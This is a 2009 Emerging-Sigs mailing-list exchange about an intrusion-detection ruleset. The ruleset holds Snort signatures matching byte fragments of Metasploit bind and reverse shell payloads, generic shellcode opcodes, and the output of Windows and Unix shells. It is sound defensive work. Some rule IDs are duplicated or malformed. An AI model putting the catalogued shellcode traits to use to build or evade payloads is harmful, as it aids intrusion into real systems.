	<51334.10.160.5.67.1259676149.squirrel@correo.andaluciajunta.es>
Message-ID: <4B1529A2.8060308@packetmail.net>

Why the nocase if we're looking for specific byte values?  Thanks.

Alberto Garcia de Dios wrote:
> False positive reduced and add some references.
>
> On shell detection with pcre not posible use flow, could be reverse or bind
> shell.
> Thank.
>
>
>
> #
> #
> #####
> # METASPLOIT SHELLCODE RULES
> #####
> #
> #
>
>
> #
> # BSD METASPLOIT RULES
> #
>
>
> #### BSD BIND SHELL #######
> # BSD Bind Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666000; rev:5;)
>
>
> # BSD Bind Shell - ENCODE: CountDown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e|";
> content:"|e2 fa 6b 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect; nocase;
> distance:1; flow:established,to_server; reference:url,www.metasploit.com;
> sid:10666001; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48 71
> 74 45 d3|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666002;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77 45
> 6a 69 63|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666003;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20 2a
> 2a cc a5|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666004;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666005; rev:5;)
>
>
> #BSD Bind Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666006; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666007; rev:5;)
>
>
> #BSD Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666008; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52 6a
> 68 58 cd|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666009;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59 6a
> 5a 58 51|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666010;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666011;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666012; rev:5;)
>
>
>
> #BSD Bind Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49 49
> 51 5a 56|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666012;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42 33
> 30 42 43|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666013;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54 42
> 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666014;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
> 41|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:1066615;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666016; rev:5;)
>
>
>
> #BSD Bind Shell - ENCODE: PexFstEnvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666017; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666018; rev:5;)
>
>
> #BSD Bind Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef ff
> ff ff|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666019;
> rev:5;)
>
>
> #BSD Bind Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49 49
> 49 49 49|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666020;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666021; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666022; rev:5;)
> #### EOF BSD BIND SHELL ######
>
>
>
>
>
> ### BSD REVERSE SHELL #######
> #BSD Reverse Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666023; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666024; rev:5;)
>
>
> #BSD Reverse Shell - ENCODE: Countdown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2 fa
> 6b 63 5b 9d|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666025;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26 7c
> 96 7d 79 7e|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666026;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a 50
> 54 b2 df 6d|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666027;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666028; rev:5;)
>
>
>
> #BSD Reverse Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666029; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666030; rev:5;)
>
>
> #BSD Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3 50|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666031;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666032; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02 59
> b0 5a 51 57|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666033;
> rev:5;)
>
>
>
> #BSD Reverse Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e 4f
> 49 38 41 4e|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666034;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44 56
> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:10666035; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
> 42 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666036;
> rev:5;)
>
>
>
> #BSD Reverse Shell - ENCODE: PexFnstenvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666037; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666038; rev:5;)
>
>
>
> #BSD Reverse Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
> ff ff ff|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666039;
> rev:5;)
>
>
>
> #BSD Reverse Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666040; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666041; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
> reference:url,www.metasploit.com; sid:10666042; rev:5;)
> ##### EOF BSD Reverse Shell#####
>
>
>
>
> ##### BSD SPARC Bind Shell #########
> #BSD SPARC Bind Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03 e0
> 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666043;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff
> fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666044;
> rev:5;)
>
>
> #BSD SPARC Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20
> 10 82 10 20 68|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666045;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20
> 6a 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666046;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20
> 1e 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666047;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf
> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:10666048; rev:5;)
> #### EOF BSD SPARC Bind Shell #########
>
>
> ### BSD SPARC Reverse Shell ########
> #BSD SPARC Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10
> 20 02 82 10 20 61|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666049;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2
> 60 01 82 10 20 5a|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666050;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f
> c0|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666051;
> rev:5;)
>
> #BSD SPARC Reverse Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666052;
> rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf
> ff fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
> flow:established,to_server; reference:url,www.metasploit.com; sid:10666053;
> rev:5;)
> #### EOF BSD SPARC Reverse Shell ####
>
>
>
>
>
>
>
> #
> ### Shellcode develop patron by h0f JennyLab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
>
>
> # Alpha payload
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
> classtype:shellcode-detect; flow:established,to_server; distance:0;
> sid:10666054; rev:5; nocase;)
>
>
>
>
> # Call payload label and pop next bytes.
>   #jmp short loader
>   #label:
>   #      code here
>   #loader:
>   # call label <--- here
>   # db '/bin/bash'
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
> classtype:shellcode-detect; flow:established,to_server;
> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666055; rev:5;
> nocase;)
>
>
>
>
>
> # xor eax, eax | xor ebx, ebx
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
> content:"|31 c0 31 db|"; classtype:shellcode-detect;
> flow:established,to_server;
> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666056; rev:5;
> nocase;)
>
>
>
> # mov al, 0x01 | int 0x80
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit syscall";
> content:"|b0 01 cd 80|"; classtype:shellcode-detect;
> flow:established,to_server;
> reference:url,www.jennylab.org/codes/MultiString.opcode; sid:10666057; rev:5;
> nocase;)
>
>
>
> # pop ebx on call returned and two interruptions in 60 bytes.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
> within:60; classtype:shellcode-detect; flow:established,to_server;
> sid:10666058; rev:5;)
>
>
> # pop ecx to use in interruption and before jmp to label data loader
> # VMWare 2 server ( 8088 default port ) false positive.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
> within:512; classtype:shellcode-detect; flow:established,to_server;
> sid:10666059; rev:5;)
>
>
> # three push ( bsd shellcodes use very match push ) | very much false positive
> on ssh and other services. use !$SSH_PORT ( before define var ).
> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
> classtype:shellcode-detect; flow:established,to_server; sid:10666060; rev:5;)
>
>
> # xor all regs
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
> content:"|31 d2|"; distance:1; classtype:shellcode-detect;
> flow:established,to_server;
> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666061; rev:5;
> nocase;)
>
>
>
> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop ( multiple
> exploits use).
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of seh
> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
> flow:established,to_server; sid:10666062; rev:5;)
>
>
> # movl $0x01, %al | int 0x91
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit Solaris.";
> content:"|b0 01 cd 91|"; classtype:shellcode-detect;
> flow:established,to_server; sid:106669063; rev:5; nocase;)
>
>
>
> #
> # WINDOWS SHELL
> #
>
> # C:\masm32> or C:\>
> # *:\*>
> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
> # \w\:\\.*\>
> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
>
>
> # 12 dirs  83.453.632.512 bytes free
> # * dirs * bytes *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
>
> # 2 Dir(s)  37.604.442.112 bytes free
> # * Dir(s) * bytes *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
>
>
> # 02/03/2009  23:51    <DIR>          masm32
> # **/**/**** **:** <DIR> *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092; rev:1;)
>
>
> # %systemroot%
> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73
> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1; nocase;)
>
>
> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
> alert tcp any any -> any any (msg:"ET Windows registry edit"; content:"reg ";
> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import|flags).*/";
> nocase; sid:966600094; rev:1;)
>
>
>
> #
> # Unix shell
> #
>
> # command >&0 <--- write on std with non create pipe shellcode
> alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
>
>
> #Unix bash user and root ($ and #).
> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
>
> #Unix sh and pure bash ($ and #)
> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
>
>   

From albertogdedios at andaluciajunta.es  Tue Dec  1 09:47:00 2009
From: albertogdedios at andaluciajunta.es (Alberto Garcia de Dios)
Date: Tue, 1 Dec 2009 15:47:00 +0100 (CET)
Subject: [Emerging-Sigs] jennylab.rules
In-Reply-To: <4B1529A2.8060308@packetmail.net>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>	<4B140F94.6000604@packetmail.net>	<BEC67188-494F-4BED-994D-7640414E2992@gmail.com>	<6116b9e20911301101n26d6b64bk8d71ce557ac8397d@mail.gmail.com>
	<51334.10.160.5.67.1259676149.squirrel@correo.andaluciajunta.es>
	<4B1529A2.8060308@packetmail.net>
Message-ID: <62405.10.160.5.68.1259678820.squirrel@correo.andaluciajunta.es>

If the shellcode contains a loop lowercase or uppercase??

-- 
Alberto Garcia de Dios.




> Why the nocase if we're looking for specific byte values?  Thanks.
>
> Alberto Garcia de Dios wrote:
>> False positive reduced and add some references.
>>
>> On shell detection with pcre not posible use flow, could be reverse or bind
>> shell.
>> Thank.
>>
>>
>>
>> #
>> #
>> #####
>> # METASPLOIT SHELLCODE RULES
>> #####
>> #
>> #
>>
>>
>> #
>> # BSD METASPLOIT RULES
>> #
>>
>>
>> #### BSD BIND SHELL #######
>> # BSD Bind Shell - ENCODE: PexFnstenvSub
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666000; rev:5;)
>>
>>
>> # BSD Bind Shell - ENCODE: CountDown
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e|";
>> content:"|e2 fa 6b 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect;
>> nocase;
>> distance:1; flow:established,to_server; reference:url,www.metasploit.com;
>> sid:10666001; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48
>> 71
>> 74 45 d3|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666002;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77
>> 45
>> 6a 69 63|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666003;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20
>> 2a
>> 2a cc a5|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666004;
>> rev:5;)
